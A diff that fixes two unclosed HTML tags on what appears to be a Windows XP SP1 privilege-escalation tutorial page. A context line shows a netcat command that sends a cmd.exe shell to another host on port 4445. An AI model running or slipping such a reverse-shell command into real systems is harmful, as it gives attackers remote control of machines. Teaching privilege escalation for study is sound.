--- a/content/winxp-sp1-privesc.html
+++ b/content/winxp-sp1-privesc.html
@@ -54,7 +54,7 @@
 					<nav class="navbar navbar-default">
 						<div class="container-fluid">
 							<div class="collapse navbar-collapse" id="navbar" style="min-width: 110px;border:none;margin-left:2%">
-								<p>General<p>
+								<p>General</p>
 								<ul class="nav navbar-nav">
 									<li><a href="../index.html">HOME</a></li>
 									<li><a href="../readme.html">README.TXT</a></li>
@@ -331,7 +331,7 @@ C:\nc.exe -nv 192.168.0.2 4445 -e C:\WINDOWS\System32\cmd.exe
                         </ol>
                         <br />
                         <center><b><p>** For more information, check out the extra links and sources. **</p></b></center>
-                        <h5>50URC35:<h5>
+                        <h5>50URC35:</h5>
                         <ul id="sources">
                             <li><a href="https://www.fuzzysecurity.com/tutorials/16.html">FuzzySecurity Privilege Escalation guide</a></li>
                         </ul>
